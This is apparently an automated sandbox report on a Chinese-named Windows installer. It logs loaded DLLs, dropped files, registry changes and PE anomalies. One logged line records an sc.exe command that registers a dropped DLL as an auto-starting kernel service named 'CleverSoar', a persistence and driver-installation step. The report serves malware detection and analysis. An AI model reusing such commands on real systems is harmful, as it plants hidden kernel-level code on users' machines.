Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic file information: File size 7238486 > 1048576
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2206263552.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2206996636.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_004457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_004457D0
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x3439bf
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x3439bf
Source: update.vac.7.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: real checksum: 0x0 should be: 0x6ed131
Source: hrsw.vbc.7.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.drStatic PE information: section name: .didata
Source: 7zr.exe.7.drStatic PE information: section name: .sxdata
Source: update.vac.7.drStatic PE information: section name: .00cfg
Source: update.vac.7.drStatic PE information: section name: .voltbl
Source: update.vac.7.drStatic PE information: section name: .#.q
Source: hrsw.vbc.7.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.7.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.7.drStatic PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B8C5B push ecx; ret 7_2_6C0B8C6E
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF60F00 push ss; retn 0001h7_2_6BF60F0A
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C186F10 push eax; ret 7_2_6C186F2E
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0EB9F4 push 004AC35Ch; ret 7_2_6C0EBA0E
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C187290 push eax; ret 7_2_6C1872BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C45F4 push 0046C35Ch; ret 11_2_003C460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045FB10 push eax; ret 11_2_0045FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0045FE90 push eax; ret 11_2_0045FEBE
Source: update.vac.1.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.7.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.7.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
